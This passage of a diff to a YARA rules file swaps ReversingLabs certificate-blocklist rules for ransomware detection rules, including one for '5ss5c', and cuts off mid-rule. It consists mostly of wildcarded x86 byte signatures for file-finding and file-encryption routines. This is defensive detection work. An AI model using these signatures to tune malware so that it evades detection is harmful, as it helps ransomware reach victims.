+            8B 45 ?? 50 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 6A ?? 6A ?? 57 8B 06 50
+            E8 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ??
+            50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 50 6A ?? 8B 45 ?? 50 8B 45 ?? 50
+            8B 06 50 E8 ?? ?? ?? ?? 85 C0 75 ?? BB ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? EB ?? BB ??
+            ?? ?? ?? EB ?? BB ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 33 C0 5A
+            59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
+        }
+		$encrypt_files_p2 = {
+            8D 40 ?? 55 8B EC 83 C4 ?? 53 33 DB 89 5D ?? 89 5D ?? 8B D9 89 55 ?? 89 45 ?? 33 C0
+            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 89 45 ?? 33 C0 89 45 ?? 33 C0 89 45 ?? 33
+            C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? 50 8B 45 ?? 8D 50 ?? 8B 45 ?? 33 C9
+            E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 83 C0 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B
+            40 ?? E8 ?? ?? ?? ?? 8B D0 4A 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? E8
+            ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 8B 45 ?? 8B 48 ?? 8B 45 ?? 8D 50 ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? 8B 45 ?? 50 53 8B 45 ?? 50 8B 45 ?? 50 8D 4D ?? 8D 55 ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ??
+            8B 45 ?? 50 8D 45 ?? 50 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 8B 45
+            ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 8B 45 ?? 83 C0 ?? 8B 55 ??
+            E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 45 ?? 50 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 50 6A ?? 6A
+            ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 85 C0 74 ?? C7 45 ?? ?? ??
+            ?? ?? 8B 45 ?? 83 C0 ?? 8B 55 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? E8 ?? ?? ?? ?? EB
+            ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ??
+            ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 8D 50 ?? 8B 45 ?? 8B 4D ?? E8 ?? ??
+            ?? ?? C3
+        }
+		$find_files = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 5D ?? 8B D9 89 55 ?? 89
+            45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF
+            30 64 89 20 8B C3 E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ??
+            80 7C 02 ?? ?? 74 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45
+            ?? 80 38 ?? 75 ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 85 F6 0F 95 C0 EB ?? F7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? 77 ?? 83 3B ?? 74 ?? 8B C3 BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            FF 33 FF 75 ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF
+            B5 ?? ?? ?? ?? 8B C3 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ??
+            ?? ?? F7 D8 1B C0 F7 D8 84 C0 75 ?? 56 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Enforced Licensing Intermediate PCA" and pe.signatures [ i ] . serial == "3a:ab:11:de:e5:2f:1b:19:d0:56" )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_6102B01900000000002F : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_5Ss5C : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects 5ss5c ransomware."
 		author = "ReversingLabs"
-		id = "b98769c6-805e-5cd0-96f1-67418fec40a6"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "c69f44de-8e48-518d-87bf-d21d11223a2f"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1091-L1106"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6c42daa8b8730541bb422ac860ec4b0830e00fdb732e4bb503054dbcae1ff6d4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.5ss5c.yara#L1-L267"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "74fcec568906a01dade7091c63cffbe4afa49c4705d9c1f21d10b4eee655a805"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "5ss5c"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Enforced Licensing Registration Authority CA (SHA1)" and pe.signatures [ i ] . serial == "61:02:b0:19:00:00:00:00:00:2f" )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_01E2B4F759811C64379Fca0Be76D2Dce : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "00effc8a-066c-54ff-891e-c635d161b171"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1108-L1124"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0dff7a9f2e152c20427ea231449b942a040e964cb7dad90271d2865290535326"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B FA 89 BD ?? ?? ?? ?? 8B F1
+            8B 5D ?? 33 C0 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 45 ?? 89 45 ?? 6A ?? 89 45 ??
+            89 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D ?? 83 C4 ?? C7 00 ?? ?? ?? ?? C7 40
+            ?? ?? ?? ?? ?? 8B 45 ?? 89 08 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ??
+            57 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D
+            ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 45 ?? 89 08 C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D ?? C7 00 ?? ?? ?? ?? C7 40 ??
+            ?? ?? ?? ?? 8B 45 ?? 89 08 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6
+            45 ?? ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 C4 ?? C7
+            00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 08 C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 0F 57 C0 8B 43 ?? 66 0F D6
+        }
+		$find_files_p2 = {
+            45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C6 45
+            ?? ?? 8B 3B 85 FF 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 8B 47 ?? 8D 8D ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 89 47 ?? 89 7D ?? E8 ?? ?? ?? ?? 6A
+            ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 3B
+            C8 74 ?? 83 78 ?? ?? 8D 48 ?? 72 ?? 8B 09 FF 70 ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 51
+            50 FF 15 ?? ?? ?? ?? 8B C8 89 8D ?? ?? ?? ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 8B D8 66 66
+            0F 1F 84 00 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ??
+            8B 8D ?? ?? ?? ?? 0F 43 45 ?? C7 45 ?? ?? ?? ?? ?? C6 00 ?? 8D 41 ?? 83 79 ?? ?? 72
+            ?? 8B 00 FF 71 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B C8 E8 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? 8B D0 8D 79 ?? 8A 01 41 84 C0 75 ?? 2B CF 8D 85 ?? ?? ?? ?? 51
+            50 8B CA E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 F6 85 ??
+            ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 33 FF FF B7 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 0F 85 ?? ?? ?? ?? 83 C7 ?? 81 FF ?? ?? ?? ?? 72 ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ??
+            ?? ?? ?? 8B 9D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 83 CB ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 50 89 9D ?? ?? ?? ?? 89 5D ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C7
+        }
+		$find_files_p3 = {
+            45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 6A ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 85 C0 75
+            ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0
+            8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? 83 7D ?? ?? 8D
+            8D ?? ?? ?? ?? FF 75 ?? 0F 43 55 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B
+            40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ??
+            8B 5D ?? 8D 55 ?? 53 FF B5 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 8B 85 ??
+            ?? ?? ?? 8B 40 ?? 85 FF 0F 85 ?? ?? ?? ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ??
+            8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51
+            ?? 0F 1F 80 ?? ?? ?? ?? 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 51 50 8D 4D
+        }
+		$find_files_p4 = {
+            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ??
+            ?? 51 50 8D 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ?? 8B FC 0F 43 45 ?? C7
+            07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ?? 85 DB 74 ?? 6A ??
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D 8D ?? ?? ?? ?? 89
+            47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 83 EC ?? 83 7D ?? ?? 8B FC 0F
+            43 4D ?? 03 C1 C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ??
+            85 DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D
+            8D ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ??
+            8B FC 0F 43 45 ?? C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D
+            ?? 85 DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ??
+            8D 8D ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? BA ?? ?? ?? ?? C6 45
+        }
+		$find_files_p5 = {
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
+            ?? 8D 55 ?? 83 7D ?? ?? 8B 4D ?? 0F 43 55 ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 83 F9 ??
+            72 ?? 49 83 C8 ?? 3B C8 89 4D ?? 0F 42 C1 03 C2 0F 1F 40 ?? 80 38 ?? 75 ?? 0F B6 08
+            80 F9 ?? 75 ?? 33 C9 EB ?? 1B C9 83 C9 ?? 85 C9 74 ?? 3B C2 74 ?? 48 EB ?? 2B C2 EB
+            ?? 83 C8 ?? 6A ?? 8D 78 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            83 C4 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 08 C6 45 ?? ??
+            8B 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
+            ?? ?? 3B C7 0F 82 ?? ?? ?? ?? 2B C7 C7 45 ?? ?? ?? ?? ?? 83 C9 ?? 89 45 ?? 83 F8 ??
+            0F 42 C8 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 51 03 C7 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 83 8D ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+        }
+		$find_files_p6 = {
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ?? 8B FC 0F 43 45 ?? C7 07
+            ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ?? 85 DB 74 ?? 6A ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D 8D ?? ?? ?? ?? 89 47
+            ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 83 EC ?? 83 7D ?? ?? 8B FC 0F 43
+            4D ?? 03 C1 C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ?? 85
+            DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D 8D
+            ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ?? 8B
+            FC 0F 43 45 ?? C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ??
+            85 DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D
+            8D ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? BA ?? ?? ?? ?? C6 45 ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
+            33 FF 66 66 0F 1F 84 00 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? FF B7 ?? ?? ?? ?? 0F 43 45
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ??
+            ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 C7 ?? 83 FF
+            ?? 72 ?? 8B 5D ?? 85 DB 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 74 ?? 8B C8 E8 ?? ?? ??
+            ?? 8B 7E ?? 8D 8D ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8
+        }
+		$find_files_p7 = {
+            74 ?? 8B 01 85 C0 74 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B 40 ?? 89 01
+            EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 46 ?? ?? EB ??
+            50 8B CE E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            85 C0 75 ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 74 ?? 8B C8 E8 ?? ?? ?? ?? 8B 7E ?? 8D 8D
+            ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8 74 ?? 8B 01 85 C0
+            74 ?? 66 0F 1F 44 00 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B 40 ?? 89 01
+            EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 46 ?? ?? EB ??
+            50 8B CE E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 8D ?? ?? ?? ?? ?? 8B D8 8B 7D ?? 85 FF 74 ?? 8B 3F 8B CB E8 ?? ?? ?? ?? 3B
+        }
+		$find_files_p8 = {
+            C7 74 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? CC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 43 ?? 3B 45 ?? 74 ?? 8D 85 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B3 ?? EB ?? 32 DB 8B 85 ??
+            ?? ?? ?? A8 ?? 74 ?? 83 E0 ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 84 DB 0F
+            84 ?? ?? ?? ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 0F 84 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ??
+            8B 7E ?? 8D 8D ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8 74
+            ?? 8B 01 85 C0 74 ?? 90 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B 40 ?? 89 01
+            EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 46 ?? ?? E9 ??
+            ?? ?? ?? 83 FB ?? 0F 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 83 8D ?? ?? ?? ?? ?? 8B D8 8B 7D ?? 85 FF 74 ?? 8B 3F 8B CB E8 ??
+            ?? ?? ?? 3B C7 74 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? CC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 43 ?? 3B 45 ?? 75 ?? 8D
+        }
+		$find_files_p9 = {
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B3 ?? EB ?? 32
+            DB 8B 85 ?? ?? ?? ?? A8 ?? 74 ?? 83 E0 ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ??
+            C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? C6 45 ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 0F 84 ??
+            ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8B 7E ?? 8D 4D ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ??
+            F7 D9 1B C9 23 C8 74 ?? 8B 01 85 C0 74 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B
+            01 8B 40 ?? 89 01 EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 46 ??
+            ?? E9 ?? ?? ?? ?? 83 FB ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 74 ?? 8B C8 E8 ?? ??
+            ?? ?? 8B 7E ?? 8D 4D ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8 74 ??
+            8B 01 85 C0 74 ?? 66 0F 1F 44 00 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B
+        }
+		$find_files_p10 = {
